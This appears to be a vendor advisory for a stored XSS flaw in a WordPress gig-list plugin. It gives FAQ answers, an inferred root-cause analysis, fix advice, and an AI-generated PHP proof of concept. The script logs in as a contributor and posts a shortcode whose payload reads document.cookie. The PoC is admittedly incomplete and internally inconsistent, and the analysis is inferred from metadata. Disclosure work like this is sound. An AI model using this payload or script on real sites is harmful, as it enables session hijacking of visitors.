What is CVE-2026-1805?

CVE-2026-1805 is a stored cross-site scripting (XSS) vulnerability in the DA Media GigList plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘list_title’ attribute of the damedia_giglist shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes. When an attacker uses the shortcode with a malicious ‘list_title’, the unsanitized content is stored and executed in the browser of anyone who views the affected page.

Who is affected by this vulnerability?

Authenticated users with contributor-level access or higher can exploit this vulnerability. Any WordPress site using the DA Media GigList plugin version 1.9.0 or earlier is at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if the DA Media GigList plugin version is 1.9.0 or earlier. Additionally, review any posts or pages that utilize the damedia_giglist shortcode for potentially malicious content.

What is the severity of this vulnerability?

The vulnerability has a medium severity rating with a CVSS score of 6.4. This indicates a moderate risk, as it allows for session hijacking and other malicious actions without requiring extensive privileges.

How can I fix this vulnerability?

To fix the vulnerability, update the DA Media GigList plugin to the latest version where the issue is resolved. Additionally, ensure that the shortcode handler properly sanitizes and escapes user input using WordPress functions like sanitize_text_field() and esc_attr().

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by inserting a malicious shortcode into a post or page. It shows that the attack requires valid contributor credentials and demonstrates the potential for executing JavaScript in the victim’s browser.

What are the potential impacts of exploitation?

If exploited, this vulnerability can lead to session hijacking, unauthorized administrative actions, defacement of the site, and distribution of malware. The impact can extend beyond the plugin, affecting other components of the website.

What are the recommended practices to secure WordPress sites?

Regularly update all plugins and themes to their latest versions, implement strong user access controls, and conduct security audits to identify vulnerabilities. Additionally, consider using security plugins that provide input sanitization and output escaping features.

Is there a way to temporarily mitigate the risk?

If immediate updates are not possible, you can temporarily disable the DA Media GigList plugin to prevent exploitation. Additionally, review and sanitize any existing content that uses the damedia_giglist shortcode to remove potential malicious scripts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1805: DA Media GigList <= 1.9.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'list_title' Shortcode Attribute (damedia-giglist)

CVE ID CVE-2026-1805

Plugin damedia-giglist

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.9.0

Patched Version —

Disclosed March 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1805 (metadata-based):
The vulnerability is a stored cross-site scripting (XSS) flaw in the DA Media GigList WordPress plugin. The CWE-79 classification confirms improper neutralization of input during web page generation. The vulnerability description states insufficient input sanitization and output escaping on user-supplied attributes for the `damedia_giglist` shortcode. The attack vector targets the `list_title` shortcode attribute. Authenticated attackers with contributor-level access or higher can inject malicious scripts into pages using the shortcode. The scripts execute when users view the compromised page.

Atomic Edge research infers the root cause from the CWE classification. The plugin likely registers a shortcode handler function for `damedia_giglist`. This function receives user-controlled attributes, including `list_title`. The handler fails to sanitize the `list_title` attribute value before storing it in the database. The plugin also fails to escape the attribute value when outputting it in the frontend HTML. This creates a classic stored XSS condition.

The exploitation method involves an authenticated user creating or editing a post or page. The attacker inserts the `[damedia_giglist]` shortcode with a malicious `list_title` attribute containing JavaScript. WordPress stores this content. When any visitor loads the page, WordPress executes the shortcode handler. The handler outputs the unsanitized `list_title` value without escaping, causing script execution in the victim’s browser.

A fix requires two code changes. First, the shortcode handler must sanitize the `list_title` attribute on input using `sanitize_text_field()` or a similar WordPress sanitization function. Second, the handler must escape the attribute on output using `esc_attr()` when echoing the value in HTML attributes, or `wp_kses_post()` if outputting within HTML content.

Exploitation impact includes session hijacking, administrative actions performed by victims, defacement, and malware distribution. The CVSS vector indicates network attack vector, low attack complexity, low privileges required, no user interaction, and scope change with low confidentiality and integrity impact. The scope change (S:C) suggests the vulnerability may affect other site components beyond the plugin’s own security context.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1805 - DA Media GigList <= 1.9.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'list_title' Shortcode Attribute
<?php
/**
 * Proof of Concept for CVE-2026-1805
 * Assumptions:
 * 1. The target WordPress site has DA Media GigList plugin <= 1.9.0 installed.
 * 2. Valid contributor-level credentials are available.
 * 3. The plugin's shortcode handler does not sanitize/escape the 'list_title' attribute.
 * 4. The attacker can create/edit posts/pages with shortcodes.
 */

$target_url = 'https://example.com/wp-admin/post-new.php';
$username = 'contributor_user';
$password = 'contributor_pass';

// Payload: XSS via list_title attribute in damedia_giglist shortcode
// Using onmouseover for demonstration (requires user interaction).
// Real attacks would use onload or script tags for automatic execution.
$shortcode_payload = '[damedia_giglist list_title="<img src=x onerror=alert(document.cookie)>"]';

// Initialize cURL session for WordPress login
$ch = curl_init();

// First, get the login page to retrieve nonce and cookies
curl_setopt($ch, CURLOPT_URL, 'https://example.com/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$login_page = curl_exec($ch);

// Extract login nonce (WordPress uses 'log' and 'pwd' fields, nonce in 'wp_nonce')
// This is a simplified example; real implementation needs DOM parsing.

// Perform login
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'https://example.com/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, 'https://example.com/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);

// Check if login succeeded (simplified)
if (strpos($login_response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Now create a new post with the malicious shortcode
$post_data = [
    'post_title' => 'Test Post with XSS',
    'content' => $shortcode_payload,
    'post_status' => 'draft',
    'action' => 'editpost',
    '_wpnonce' => '', // Would need to extract actual nonce
    'post_type' => 'post'
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$post_response = curl_exec($ch);

// Verify the shortcode was inserted
if (strpos($post_response, $shortcode_payload) !== false) {
    echo "Exploit successful. Post created with malicious shortcode.n";
    echo "Visit the post to trigger XSS payload.n";
} else {
    echo "Post creation may have failed.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1805?
Overview of the vulnerability
CVE-2026-1805 is a stored cross-site scripting (XSS) vulnerability in the DA Media GigList plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘list_title’ attribute of the damedia_giglist shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes. When an attacker uses the shortcode with a malicious ‘list_title’, the unsanitized content is stored and executed in the browser of anyone who views the affected page.
Who is affected by this vulnerability?
User roles and impact
Authenticated users with contributor-level access or higher can exploit this vulnerability. Any WordPress site using the DA Media GigList plugin version 1.9.0 or earlier is at risk.
How can I check if my site is vulnerable?
Identifying affected installations
To check if your site is vulnerable, verify if the DA Media GigList plugin version is 1.9.0 or earlier. Additionally, review any posts or pages that utilize the damedia_giglist shortcode for potentially malicious content.
What is the severity of this vulnerability?
Understanding the risk level
The vulnerability has a medium severity rating with a CVSS score of 6.4. This indicates a moderate risk, as it allows for session hijacking and other malicious actions without requiring extensive privileges.
How can I fix this vulnerability?
Mitigation strategies
To fix the vulnerability, update the DA Media GigList plugin to the latest version where the issue is resolved. Additionally, ensure that the shortcode handler properly sanitizes and escapes user input using WordPress functions like sanitize_text_field() and esc_attr().
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can exploit the vulnerability by inserting a malicious shortcode into a post or page. It shows that the attack requires valid contributor credentials and demonstrates the potential for executing JavaScript in the victim’s browser.
What are the potential impacts of exploitation?
Consequences of a successful attack
If exploited, this vulnerability can lead to session hijacking, unauthorized administrative actions, defacement of the site, and distribution of malware. The impact can extend beyond the plugin, affecting other components of the website.
What are the recommended practices to secure WordPress sites?
General security measures
Regularly update all plugins and themes to their latest versions, implement strong user access controls, and conduct security audits to identify vulnerabilities. Additionally, consider using security plugins that provide input sanitization and output escaping features.
Is there a way to temporarily mitigate the risk?
Short-term solutions
If immediate updates are not possible, you can temporarily disable the DA Media GigList plugin to prevent exploitation. Additionally, review and sanitize any existing content that uses the damedia_giglist shortcode to remove potential malicious scripts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations